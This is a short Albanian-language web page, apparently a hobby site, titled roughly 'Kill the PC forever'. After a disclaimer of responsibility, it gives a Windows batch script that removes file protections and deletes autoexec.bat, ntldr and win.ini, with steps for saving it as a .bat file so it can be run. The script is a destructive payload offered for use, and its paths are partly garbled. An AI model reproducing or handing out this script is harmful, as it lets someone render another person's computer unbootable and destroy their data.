Music:

   
  K!nnezzi.
  Fikja pc per Gjithmon
 
fillimisht ne nuk mbajm pergjegjsi per demet qe mund ti shkaktoni ju.


HAPIM notepadin dhe vendosim ket kod:@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.inie ruajm fajllin me qfar do emri nuk o me rendesi mirpo me prapashtesen .bat

per ta ruajtusi bat file tek rubrika text file document nderrojni ne all files.
 
  Today, there have been 14 visitors (29 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free